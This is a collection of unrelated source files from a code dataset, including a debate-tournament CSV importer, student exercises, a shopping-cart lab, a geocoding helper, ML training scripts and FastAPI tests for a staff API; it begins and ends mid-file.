self.tournament.breakcategory_set.get(slug=category)\n }\n self._import(f, pm.Team.break_categories.through, break_category_interpreter)\n\n def speakers_interpreter(lineno, line):\n for i in [1, 2]:\n subline = {field: line.get('speaker%d_%s' % (i, field)) for field in ['name', 'email', 'gender']}\n subline['gender'] = self.lookup_gender(subline['gender'])\n subline['team'] = teams[lineno]\n yield subline\n speakers = self._import(f, pm.Speaker, speakers_interpreter)\n\n def speaker_category_interpreter(lineno, line):\n for i in [1, 2]:\n if line.get('speaker%d_category' % i):\n for category in line['speaker%d_category' % i].split('/'):\n yield {\n 'speakercategory': 
self.tournament.speakercategory_set.get(slug=category),\n 'speaker': speakers[(lineno, i)],\n }\n self._import(f, pm.Speaker.categories.through, speaker_category_interpreter)\n\n def import_venues(self, f, auto_create_categories=True):\n interpreter = make_interpreter(tournament=self.tournament, DELETE=['category'])\n self._import(f, vm.Venue, interpreter)\n\n if auto_create_categories:\n def venue_category_interpreter(lineno, line):\n if not line.get('category'):\n return None\n return {'name': line['category']}\n self._import(f, vm.VenueCategory, venue_category_interpreter, expect_unique=False)\n\n def venue_category_venue_interpreter(lineno, line):\n if line.get('category'):\n return {\n 'venuecategory': vm.VenueCategory.objects.get(name=line['category']),\n 'venue': vm.Venue.objects.get(name=line['name'])\n }\n\n self._import(f, vm.VenueCategory.venues.through, venue_category_venue_interpreter)\n\n def import_team_conflicts(self, f):\n interpreter = make_interpreter(\n team=lambda x: pm.Team.objects.lookup(name=x, tournament=self.tournament),\n adjudicator=lambda x: pm.Adjudicator.objects.get(\n Q(tournament=self.tournament) | Q(tournament__isnull=True), name=x),\n )\n self._import(f, am.AdjudicatorConflict, interpreter)\n\n def import_institution_conflicts(self, f):\n interpreter = make_interpreter(\n institution=pm.Institution.objects.lookup,\n adjudicator=lambda x: pm.Adjudicator.objects.get(\n Q(tournament=self.tournament) | Q(tournament__isnull=True), name=x),\n )\n self._import(f, am.AdjudicatorInstitutionConflict, interpreter)\n\n def import_team_institution_conflicts(self, f):\n \"\"\"Adds team conflicts for all adjudicators for the listed institution.\n For example: if \"institution\" is Hobbiton and \"team\" is Dorwinion AB,\n this adds conflicts for Dorwinion AB against all adjudicators from\n Hobbiton.\"\"\"\n\n def interpreter(lineno, line):\n institution = pm.Institution.objects.lookup(line['institution'])\n team = pm.Team.objects.lookup(line['team'])\n for adj in institution.adjudicator_set.all():\n yield {\n 'team': team,\n 'adjudicator': adj,\n }\n self._import(f, am.AdjudicatorConflict, interpreter)\n","sub_path":"tabbycat/importer/importers/boots.py","file_name":"boots.py","file_ext":"py","file_size_in_byte":8319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243418148","text":"# %load q06_create_runs_series/build.py\n#Default Imports\nfrom greyatomlib.numpy_advanced.q01_get_total_deliveries_players.build import ipl_matches_array\nimport pandas as pd\n\nmatch = ipl_matches_array[:,[0,11,16]]\ndelivery = pd.Series(match[:,1])\ndef create_runs_series(match_code):\n df = pd.DataFrame(data = match,index = delivery)\n new_df = df[df.iloc[:,0] == match_code]\n runs = new_df.iloc[:,2]\n return runs\n#Your Solution\n","sub_path":"q06_create_runs_series/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210133182","text":"import random\nimport numpy as np\n\n\ndef train_test_divide(data):\n ndim = data['X'].shape\n num_rain = round(0.7*ndim[1])\n num_test = ndim[1] - num_rain\n\n test = random.sample(range(0, ndim[1]), num_test)\n ttmap = np.zeros([ndim[1], 1])\n ttmap[test] = 1\n train = np.where(ttmap == 0)\n train = {'X': data['X'][:, train[0]], 'Y': data['Y'][:, train[0]]}\n test = {'X': data['X'][:, test], 'Y': data['Y'][:, test]}\n\n return {'train': train, 'test': 
test}\n","sub_path":"dataset/TrainTestDivide.py","file_name":"TrainTestDivide.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"175794239","text":"#Name: Nguyen Vo\r\n#PISD: 1673509\r\n\r\n\r\n#Initalize class ItemToPurchase\r\nclass ItemToPurchase:\r\n def __init__(self, name = 'none', price = 0, quantity = 0, description = 'none'):\r\n self.item_name = name\r\n self.item_price = price\r\n self.item_quantity = quantity\r\n self.item_description = description\r\n\r\n def print_item_cost(self):\r\n print(self.item_name + ' ' + str(self.item_quantity) + ' @ $' + str(int(self.item_price)) + ' = $' + str(int(self.item_price * self.item_quantity)))\r\n\r\n def print_item_description(self): #add print description method on for part 2 \r\n print(self.item_name + ': ' + self.item_description)\r\n\r\n#Initialize class ShoppingCart\r\nclass ShoppingCart:\r\n def __init__(self, customer_name = 'none', current_date = 'January 1, 2016'):\r\n self.customer_name = customer_name\r\n self.current_date = current_date\r\n self.cart_items = []\r\n\r\n def add_item(self, ItemToPurchase): #add items info into list \r\n self.cart_items.append(ItemToPurchase)\r\n\r\n def remove_item(self, itemName): #remove items from the list only if it already in the cart \r\n removeItem = False\r\n for i in self.cart_items:\r\n if i.item_name == itemName:\r\n self.cart_items.remove(i)\r\n removeItem = True\r\n break\r\n if not removeItem:\r\n print('Item not found in cart. Nothing removed.')\r\n\r\n def modify_item(self, ItemToPurchase): #retrieving info of item from ItemToPurchase class and modify item\r\n modifyItem = False\r\n for i in range(len(self.cart_items)):\r\n if self.cart_items[i].item_name == ItemToPurchase.item_name:\r\n modifyItem = True\r\n if (ItemToPurchase.item_price == 0 and ItemToPurchase.item_quantity == 0 and ItemToPurchase.item_description == 'none'): #checking default \r\n break\r\n else:\r\n if (ItemToPurchase.item_price != 0):\r\n self.cart_items[i].item_price = ItemToPurchase.item_price\r\n elif (ItemToPurchase.item_quantity != 0):\r\n self.cart_items[i].item_quantity = ItemToPurchase.item_quantity\r\n elif (ItemToPurchase.item_description != 'none'):\r\n self.cart_items[i].item_description = ItemToPurchase.item_description\r\n break\r\n if not modifyItem:\r\n print('Item not found in cart. 
Nothing modified.')\r\n\r\n def get_num_items_in_cart(self):\r\n numItems = 0 #quantity initilized as 0 (empty) and increase and item added \r\n for i in self.cart_items:\r\n numItems += i.item_quantity\r\n return numItems\r\n\r\n def get_cost_of_cart(self):\r\n totalCost = 0 #calculate cost by item quantity multiply to cost of that item\r\n Cost = 0\r\n for i in self.cart_items:\r\n Cost = i.item_quantity * i.item_price\r\n totalCost += Cost\r\n return totalCost\r\n\r\n def print_total(self):\r\n totalCost = self.get_cost_of_cart() #print total cost if only cart is not empty\r\n if totalCost == 0:\r\n print('SHOPPING CART IS EMPTY')\r\n else:\r\n print(self.customer_name + \"'s Shopping Cart - \" + self.current_date)\r\n print('Number of Items: ' + str(self.get_num_items_in_cart()) + '\\n')\r\n for i in self.cart_items:\r\n i.print_item_cost()\r\n\r\n print('\\nTotal: $' + str(totalCost))\r\n\r\n def print_description(self):\r\n if len(self.cart_items) == 0: #print description if only item already define in cart\r\n print('SHOPPING CART IS EMPTY')\r\n else:\r\n print(self.customer_name + \"'s Shopping Cart - \" + self.current_date)\r\n print('\\nItem Descriptions')\r\n for item in self.cart_items:\r\n item.print_item_description()\r\n\r\n def print_menu(newCart):\r\n customerCart = newCart\r\n menu = ('\\nMENU\\n'\r\n 'a - Add item to cart\\n'\r\n 'r - Remove item from cart\\n'\r\n 'c - Change item quantity\\n' #creating menu for selection desire, each letter corresponding to methods defined above\r\n \"i - Output items' descriptions\\n\"\r\n 'o - Output shopping cart\\n'\r\n 'q - Quit\\n')\r\n cmd = ''\r\n while cmd != 'q':\r\n print(menu)\r\n cmd = input('Choose an option:\\n')\r\n while (cmd != 'a' and cmd != 'o' and cmd != 'i' and cmd != 'q' and cmd != 'r' and cmd != 'c'):\r\n cmd = input('Choose an option:\\n')\r\n if cmd == 'a':\r\n print(\"ADD ITEM TO CART\")\r\n item_name = input('Enter the item name:\\n')\r\n item_description = input('Enter the item description:\\n')\r\n item_price = int(input('Enter the item price:\\n'))\r\n item_quantity = int(input('Enter the item quantity:\\n'))\r\n itemtoPurchase = ItemToPurchase(item_name, item_price, item_quantity, item_description)\r\n customerCart.add_item(itemtoPurchase)\r\n elif cmd == 'o':\r\n print('OUTPUT SHOPPING CART')\r\n customerCart.print_total()\r\n elif cmd == 'i':\r\n print(\"OUTPUT ITEMS' DESCRIPTIONS\")\r\n customerCart.print_description()\r\n\r\n elif cmd == 'r':\r\n print('REMOVE ITEM FROM CART')\r\n itemName = input('Enter name of item to remove:\\n')\r\n customerCart.remove_item(itemName)\r\n elif cmd == 'c':\r\n print('CHANGE ITEM QUANTITY')\r\n itemName = input('Enter the item name:\\n')\r\n Qty = int(input('Enter the new quantity:\\n'))\r\n itemToPurchase = ItemToPurchase(itemName,0,Qty)\r\n customerCart.modify_item(itemToPurchase)\r\n\r\n \r\n#main body part \r\nif __name__ == '__main__':\r\n customerName = input(\"Enter customer's name:\\n\")\r\n Date = input(\"Enter today's date:\\n\")\r\n\r\n print('\\nCustomer name:', customerName)\r\n print(\"Today's date:\", Date)\r\n\r\n newCart = ShoppingCart(customerName, Date) \r\n newCart.print_menu()\r\n","sub_path":"Lab10.19.py","file_name":"Lab10.19.py","file_ext":"py","file_size_in_byte":6466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"75472179","text":"'''\nI could not find a \"something\" to get geographical coordinates for Python 3.3 \nso I made this for Python 3.3. 
It returns not only the coordinates but also a \nnice googly-formatted address, postal code, country, et cetera.\nFeel free to use it in your script but mind the daily quota and avoid parsing too many\naddresses all at once. In short, don't be a dick.\nThe function name is getCoordinates\n@author: freonius@gmail.com\n'''\nimport urllib.request\nimport urllib.parse\nimport json\n\ndef getCoordinates(address) -> dict:\n\t\"\"\"\n\tGet data for a give address.\n\tThe function returns a dictionary with keys \"long\" (for the longitude), \"lat\" for\n\tthe latitude; if the address is not found the values for both will be 0; \"address\" (for \n\tthe\tfully formatted address), \"street\" (for the street name), \"city\", \"province\", \n\t\"region\", \"country\" and \"postal_code\" (they explain themselves, don't they?); if no \n\tdata for these values can be given the key will be present but its value will be an \n\tempty string. \n\tIt accepts one parameter, the address as a string. Try to be as precise as possible:\n\tso try \"Via Nuova dei Caccini Florence Italy\", and not \"Via Nuova dei Caccini Florence\"\n\t(omitting the country for exemple).\n\tI know the error reporting isn't the best (mainly because there is none) but for the\n\tway I have to use it right now I felt it was smoother this way.\n\t\"\"\"\n\t#Return values initialized to default (0s and empty strings)\n\trtnv = {\n\t\t\t\"long\" : 0,\n\t\t\t\"lat\" : 0,\n\t\t\t\"address\" : \"\",\n\t\t\t\"street\" : \"\",\n\t\t\t\"city\" : \"\",\n\t\t\t\"province\" : \"\",\n\t\t\t\"region\" : \"\",\n\t\t\t\"country\" : \"\",\n\t\t\t\"postal_code\" : \"\"\n\t\t\t}\n\tmain_url = \"http://maps.googleapis.com/maps/api/geocode/json?\"\n\tparam = {\n\t\t\"address\" : address,\n\t\t\"sensor\" : \"false\"\n\t\t}\n\turl = main_url + urllib.parse.urlencode(param)\n\ttry:\n\t\tout = json.loads(urllib.request.urlopen(url).read().decode(\"utf-8\"))\n\texcept urllib.request.URLError:\n\t\treturn rtnv\t\t#Something went wrong with the request\n\texcept ValueError:\n\t\treturn rtnv\t\t#Something went wrong with the json decode\n\t#Default values\n\tif \"Status\" in out or \"status\" in out:\n\t\tif \"Status\" in out:\n\t\t\tstat = \"Status\"\n\t\telse:\n\t\t\tstat = \"status\"\n\t\tif \"code\" in out[stat]:\n\t\t\tif out[stat][\"code\"] == 610:\n\t\t\t\t#610 is the no result code returned by Google from what I have seen while testing\n\t\t\t\treturn rtnv\n\t#Assume we make it so far, now let's fetch the data\n\tif \"results\" in out:\n\t\t#if 0 not in out[\"results\"]:\n\t\t#\treturn rtnv\n\t\tres = out[\"results\"][0]\t\t#Main resource\n\t\tif \"formatted_address\" in res:\n\t\t\trtnv[\"address\"] = res[\"formatted_address\"]\t#Full address\n\t\tif \"address_components\" in res:\n\t\t\taddress_components = res[\"address_components\"]\t#Should be a list holding all the values\n\t\t\tfor addr in address_components:\n\t\t\t\tif \"types\" in addr:\n\t\t\t\t\tif \"route\" in addr[\"types\"]:\t\t#Street\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"street\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"locality\" in addr[\"types\"]:\t#City\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"city\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"administrative_area_level_2\" in addr[\"types\"]:\t#Province\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"province\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"administrative_area_level_1\" in addr[\"types\"]:\t#Region\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"region\"] = 
addr[\"long_name\"]\n\t\t\t\t\telif \"country\" in addr[\"types\"]:\t#Country\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"country\"] = addr[\"long_name\"]\n\t\t\t\t\telif \"postal_code\" in addr[\"types\"]:\t#Postal Code\n\t\t\t\t\t\tif \"long_name\" in addr:\n\t\t\t\t\t\t\trtnv[\"postal_code\"] = addr[\"long_name\"]\n\t\tif \"geometry\" in res:\n\t\t\tif \"location\" in res[\"geometry\"]:\n\t\t\t\tif \"lng\" in res[\"geometry\"][\"location\"] and \"lat\" in res[\"geometry\"][\"location\"]:\n\t\t\t\t\trtnv[\"long\"] = res[\"geometry\"][\"location\"][\"lng\"]\n\t\t\t\t\trtnv[\"lat\"] = res[\"geometry\"][\"location\"][\"lat\"]\n\treturn rtnv\n\nif __name__ == \"__main__\":\n\twhile True:\n\t\taddr = input(\"Enter the address:\")\n\t\tif addr == \"q\" or addr == \"Q\":\n\t\t\tbreak\n\t\tstuff = getCoordinates(addr)\n\t\tif stuff[\"lat\"] == 0:\n\t\t\tprint(\"No address found!\")\n\t\t\tcontinue\n\t\tfor key in stuff.keys():\n\t\t\tprint(key,\"->\",stuff[key])","sub_path":"Nagamaki/q_connect/gglmap.py","file_name":"gglmap.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185668309","text":"class Solution:\n def numRescueBoats(self, people, limit):\n \"\"\"\n :type people: List[int]\n :type limit: int\n :rtype: int\n \"\"\"\n people.sort()\n i = 0\n j = len(people) - 1\n count = 0\n while i <= j:\n t = limit - people[j]\n if i < j and t >= people[i]:\n i += 1\n j -= 1\n count += 1\n return count\n","sub_path":"problems851-900/leetcode-881.py","file_name":"leetcode-881.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"236136229","text":"import os\nscript_dir = os.path.dirname(__file__) #<-- absolute dir the script is in\nrel_path = \"data.txt\"\nabs_file_path = os.path.join(script_dir, rel_path)\nwith open(abs_file_path) as f:\n lines = f.readlines()\n\nrows = [0] * len(lines)\ncolumns = [0] * len(lines)\nids = [0] * len(lines)\nlow = 0\nhigh = 127\n\nfor i in range(len(lines)):\n low = 0\n high = 127\n for j in range(7):\n diff = high - low + 1\n if lines[i][j] == 'F':\n high -= (diff / 2)\n elif lines[i][j] == 'B':\n low += (diff / 2)\n rows[i] = low\n\n low = 0\n high = 7\n for j in range(7, 10):\n diff = high - low + 1\n if lines[i][j] == 'L':\n high -= (diff / 2)\n elif lines[i][j] == 'R':\n low += (diff / 2)\n columns[i] = low\n ids[i] = (rows[i] * 8) + columns[i]\n\nid = set(sorted(ids))\nid2 = list(id)\n\nfor i in range(1, len(id2)):\n if id2[i - 1] != id2[i] - 1:\n print(id2[i] - 1)\n break","sub_path":"day5/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"607496600","text":"\"\"\"\nThis file consider config parameters for authorization to server VoiceKit\n\"\"\"\n\nMAX_LENGTH = 32 * 10**6\nCHUNK_SIZE = 8192\n\nlanguage_code = \"ru-RU\"\n\nclient_config = {\n \"host_stt\": \"stt.tinkoff.ru\",\n \"host_tts\": \"tts.tinkoff.ru\",\n \"port\": 443\n}\n","sub_path":"tinkoff_voicekit_client/speech_utils/config_data.py","file_name":"config_data.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"375101967","text":"\n# coding: utf-8\n\n# In[56]:\n\nimport time\n\n\n# In[41]:\n\ndef fib(n):\n if n == 1:\n return 1\n elif n == 2:\n return 2\n else:\n return 
fib(n-1) + fib(n-2)\n\n\n# In[63]:\n\nstart = time.time()\n\nresult = 0\ncurrent = 0\ni = 1\nwhile current < 4000000: \n current = fib(i)\n if current%2 == 0:\n result += current\n i += 1\n\nprint(result)\n\nend = time.time()\nelapsed = str(end - start)\nprint(\"Runtime: \"+elapsed+\" sec\")\n\n\n# In[ ]:\n\n\n\n","sub_path":"P2-EvenFibonacci.py","file_name":"P2-EvenFibonacci.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"192888001","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Lex\"\n# Date: 2017/12/21\n\n# 示例1\n# from threading import Thread\n# import time\n#\n# def foo(name):\n# time.sleep(2)\n# print('%s say hello'% name)\n#\n# if __name__ == '__main__':\n#\n# t=Thread(target=foo,args=('name',))\n# t.setDaemon(True)\n# t.start()\n#\n# print('主线程')\n# time.sleep(1)\n# print(t.is_alive())\n\n\n#示例2\n\nfrom threading import Thread\nimport time\ndef foo():\n print(123)\n time.sleep(3)\n print(\"end123\")\n\ndef bar():\n print(456)\n time.sleep(2)\n print(\"end456\")\n\nif __name__ == '__main__':\n t1=Thread(target=foo)\n t2=Thread(target=bar)\n\n t1.setDaemon(True)\n\n t1.start()\n t2.start()\n\n print('main')","sub_path":"Day38/守护线程.py","file_name":"守护线程.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"354176652","text":"#!/usr/bin/env python \n\n# The 'solution' variable should hold the\n# solution when the script is done.\nsolution = 0\nN = 101\n\n# Your code goes here.\n# Should be < 10 lines.\n\na = [[0 for i in range(N)] \\\n for j in range(N)]\n\na[0][0] = 1\nfor x in range(N):\n for y in range(N):\n if x: a[x][y] += a[x-1][y]\n if y: a[x][y] += a[x][y-1]\n\nsolution = a[-1][-1]\n\n# Even better, but not expected:\n# from math import factorial as f\n# solution = f(2*(N-1))//f(N-1)**2\n\n# Check for the correct answer.\nif N == 101: \n print(\"#6 : Grid ::\", \"Correct.\" if solution == 90548514656103281165404177077484163874504589675413336841320 else (\"Wrong: \" + str(solution)))\n\n\n","sub_path":"02/q6.py","file_name":"q6.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"455197786","text":"from player import *\n\nimport next_frame\n\nfrom games import games\n\nplayers = [Player(*game) for game in games]\n\ndef colorize(pixels):\n f = np.vectorize(indexColor, otypes=3 * [np.uint8])\n return np.stack(f(pixels), axis=-1)\n\ndef writeVideo(path, video):\n from PIL import Image\n \n for i, image in enumerate(video):\n image = np.swapaxes(image, 0, 1)\n img = Image.fromarray(image, 'RGB')\n img.save(path + '%d.png' % i)\n\ndef run(iters=1000, steps=50):\n for i in range(iters):\n for _ in range(steps):\n player = random.choice(players)\n frames, actions, events = player.play(next_frame.sequence_length)\n next_frame.train(frames, actions)\n \n next_frame.save('next_frame/')\n \n player = random.choice(players)\n frames, actions, events = player.play(next_frame.sequence_length)\n predictions = next_frame.predict(frames, actions)\n frames = frames[-len(predictions):]\n\n # concat along y axis\n joined = np.concatenate([frames, predictions], 2)\n video = colorize(joined)\n \n path = 'predictions/%d/' % i\n import os\n if not os.path.exists(path):\n os.makedirs(path)\n writeVideo(path, 
video)\n\n","sub_path":"experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"554859037","text":"from bert_text.dataset import MSRA_NER\nfrom bert_text.prepare.classification import pipline\nimport tensorflow as tf\nfrom bert_text.layers import BertLayer\nfrom tensorflow.keras.layers import Bidirectional, LSTM\nfrom bert_text.layers import BertSquadLogitsLayer\n\ndef build_model(bert_path, max_seq_length, num_labels):\n in_id = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_ids\")\n in_mask = tf.keras.layers.Input(shape=(max_seq_length,), name=\"input_masks\")\n in_segment = tf.keras.layers.Input(shape=(max_seq_length,), name=\"segment_ids\")\n bert_inputs = [in_id, in_mask, in_segment]\n\n bert_output = BertLayer(bert_path=bert_path, n_fine_tune_layers=3, pooling=\"mean\")(bert_inputs)\n squad_logits_layer = BertSquadLogitsLayer(name='squad_logits')\n start_logits, end_logits = squad_logits_layer(bert_output)\n\n model = tf.keras.models.Model(inputs=bert_inputs, outputs=[in_id, start_logits, end_logits])\n model.compile(loss=CRF.loss, optimizer=\"adam\", metrics=CRF.viterbi_accuracy)\n model.summary()\n\n return model\n\n\nif __name__ == '__main__':\n dataset = MSRA_NER()\n bert_path = \"https://tfhub.dev/google/bert_chinese_L-12_H-768_A-12/1\"\n max_seq_length = 256\n\n train_inputs, train_labels, dev_inputs, dev_labels = pipline(bert_path=bert_path,\n dataset=dataset,\n max_seq_length=max_seq_length)\n\n model = build_model(bert_path, max_seq_length, num_labels=dataset.num_labels())\n\n model.fit(train_inputs, train_labels,\n validation_data=(dev_inputs, dev_labels),\n epochs=1, batch_size=10)\n","sub_path":"examples/Machine Reading Comprehension/cn_mrc.py","file_name":"cn_mrc.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"264408352","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport time\nimport datetime\nimport json\nimport py_client\n\n'''\nrequest\n{\n \"src_type\":0,\n \"src_id\":0,\n \"dest_type\":0,\n \"dest_id\":0,\n \"msg_id\":0,\n \"version\":0,\n \"data\":{}\n}\n\nresponse\n{\n \"src_type\":0,\n \"src_id\":0,\n \"dest_type\":0,\n \"dest_id\":0,\n \"msg_id\":0,\n \"error_code\":0,\n \"data\":{}\n}\n'''\n\ndef RunTest():\n #print(help(py_client))\n if not py_client.Init():\n print(\"init fail\")\n return\n\n #连接\n conn_id=py_client.Connect(\"tcp:127.0.0.1:10010\",True)\n print(\"conn_id=%d\" % conn_id)\n\n #回显\n request = {\n \"src_type\":65001,\n \"src_id\":1,\n \"dest_type\":3,\n \"dest_id\":0,\n \"msg_id\":0,\n \"version\":0,\n \"data\":{\n \"message\":\"hello,world\"\n }\n }\n req_str=json.dumps(request)\n start=datetime.datetime.now()\n n=0\n while n < 10000:\n n+=1\n resp_str=py_client.Send(conn_id,req_str)\n resp_json=json.loads(resp_str)\n #print('resp:%s' % resp_json)\n if resp_json['function_return']:\n print('request fail,error_msg=%s, n=%d'\n % (resp_json['function_return'],n))\n break;\n if 0!=resp_json['error_code']:\n print('request fail,error_code=%d' %\n resp_json['error_code'])\n break\n\n end=datetime.datetime.now()\n print(\"time=%d\" % (end-start).seconds)\n\n py_client.Disconnect(conn_id)\n py_client.Stop()\n py_client.Wait()\n\n\nif \"__main__\"==__name__:\n 
RunTest()","sub_path":"c_plus_plus/lljz_disk/src/py_client/py_test_access_server.py","file_name":"py_test_access_server.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"28784314","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport unittest\nimport baseelement\nimport datetime\nimport db\n\n\nclass TestBaseElement(unittest.TestCase):\n\n def setUp(self):\n self.elem = baseelement.BaseElement( \\\n name=\"Rigged Car\",\n author='eracoon',\n date = datetime.datetime(2014, 10, 14, 11, 56),\n artType='3D Art',\n tags='CAR, RIGGED, RIG, LOWPOLY, RACOON MEDIA, AWESOME'.lower(),\n downloadUrl='http://opengameart.org/sites/default/files/rigged_car.zip'\n )\n\n self.elem1 = baseelement.BaseElement( \\\n name=\"Rigged Car\",\n author='eracoon',\n date = datetime.datetime(2014, 10, 14, 11, 56),\n artType='3D Art',\n tags='CAR, RIGGED, RIG, LOWPOLY, RACOON MEDIA, AWESOME'.lower(),\n downloadUrl='http://opengameart.org/sites/default/files/rigged_car.zip'\n )\n\n self.elem2 = baseelement.BaseElement( \\\n author=\"ItsBobberson\",\n date=datetime.datetime(2014, 10, 14, 18, 7),\n artType=\"2D Art\",\n tags=[\"FONT\", \"BITMAP FONT\"],\n downloadUrl=\"http://opengameart.org/sites/default/files/BitmapHandwritingFont_v1_0.zip\",\n name=\"Bitmap Handwriting Font\"\n )\n\n def tearDown(self):\n pass\n\n def test_getattr(self):\n self.assertEqual(self.elem.name, \"Rigged Car\")\n self.assertEqual(self.elem.author, 'eracoon')\n self.assertEqual(self.elem.date, datetime.datetime(2014, 10, 14, 11, 56))\n self.assertEqual(self.elem.artType, '3D Art')\n self.assertEqual(self.elem.tags, 'CAR, RIGGED, RIG, LOWPOLY, RACOON MEDIA, AWESOME'.lower())\n self.assertEqual(self.elem.downloadUrl, 'http://opengameart.org/sites/default/files/rigged_car.zip')\n\n def test___eq__(self):\n self.assertEqual(self.elem, self.elem1)\n self.assertFalse(self.elem == self.elem2)\n\n def test___ne__(self):\n self.assertNotEqual(self.elem, self.elem2)\n self.assertFalse(self.elem != self.elem1)\n\n def test_Save(self):\n DB = db.Database(\n name='String',\n author='String',\n date='DateTime',\n artType='String',\n tags='String',\n downloadUrl='String',\n primary='downloadUrl'\n )\n self.elem.Save(DB)\n\n self.assertEqual(\n DB.Query(downloadUrl='http://opengameart.org/sites/default/files/rigged_car.zip'),\n [self.elem._attr])\n\n DB.Close()\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"src/test_baseelement.py","file_name":"test_baseelement.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"85610481","text":"from fastapi import FastAPI\nfrom bson.objectid import ObjectId\nfrom pymongo.mongo_client import MongoClient\nfrom starlette.testclient import TestClient\nfrom starlette.status import (\n HTTP_200_OK,\n HTTP_201_CREATED,\n HTTP_202_ACCEPTED,\n HTTP_204_NO_CONTENT,\n HTTP_404_NOT_FOUND,\n)\n\nfrom database.database import get_db\nfrom staff import crud\nfrom staff.schemas import StaffFullInfo\nfrom staff.schema_examples import staff_example\nfrom staff.enums import Gender as GenderEnum\nfrom main import app\n\nfrom urllib.parse import urlencode\nimport pymongo\nimport pydantic\nimport pytest\n\n\nclass TestRouter:\n\n @classmethod\n def setup_class(cls):\n cls.client = TestClient(app)\n\n def setup_method(self, method):\n self.staff_id = None\n self.staff_example = staff_example.copy()\n\n def teardown_method(self, 
method):\n if self.staff_id:\n self.client.delete(f\"/staff/delete/{self.staff_id}\", headers={})\n\n def test_1_create_staff(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n assert isinstance(staff, dict)\n assert \"_id\" in staff\n self.staff_id = staff[\"_id\"]\n staff_model = StaffFullInfo(**staff)\n assert staff_model.staff_id == ObjectId(self.staff_id)\n with pytest.raises(pydantic.ValidationError):\n del staff[\"_id\"]\n staff_model = StaffFullInfo(**staff)#test ValidationError\n\n def test_2_update_staff(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n self.staff_id = staff[\"_id\"]\n self.staff_example[\"name\"] = \"Poison Ivy\"\n self.staff_example[\"age\"] = 29\n self.staff_example[\"gender\"] = GenderEnum.female\n self.staff_example[\"profession\"] = \"IT Specialist\"\n self.staff_example[\"email\"] = \"posion.ivy@example.com\"\n response = self.client.put(f\"/staff/update/{self.staff_id}\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_202_ACCEPTED\n staff = response.json()\n assert staff[\"name\"] == self.staff_example[\"name\"]\n assert staff[\"age\"] == self.staff_example[\"age\"]\n assert staff[\"gender\"] == self.staff_example[\"gender\"]\n assert staff[\"profession\"] == self.staff_example[\"profession\"]\n assert staff[\"email\"] == self.staff_example[\"email\"]\n\n def test_3_get_staff(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n self.staff_id = staff[\"_id\"]\n response = self.client.get(f\"/staff/get/{self.staff_id}\", headers={})\n assert response.status_code == HTTP_200_OK\n\n def test_4_staff_list(self):\n response = self.client.post(\"/staff/create\", headers={}, json=self.staff_example)\n assert response.status_code == HTTP_201_CREATED\n staff = response.json()\n self.staff_id = staff[\"_id\"]\n query = urlencode({\n \"gender\": staff[\"gender\"],\n \"age_lte\": (self.staff_example[\"age\"] + 10),\n \"age_gte\": staff[\"age\"],\n \"country\": staff[\"country\"],\n \"state\": staff[\"state\"],\n \"zipcode\": staff[\"zipcode\"],\n \"skills\": staff[\"skills\"],\n \"profession\": staff[\"profession\"],\n \"email\": staff[\"email\"],\n \"operator\": \"$and\",\n \"skip\": 0,\n \"limit\": 1,\n }, doseq=True)\n response = 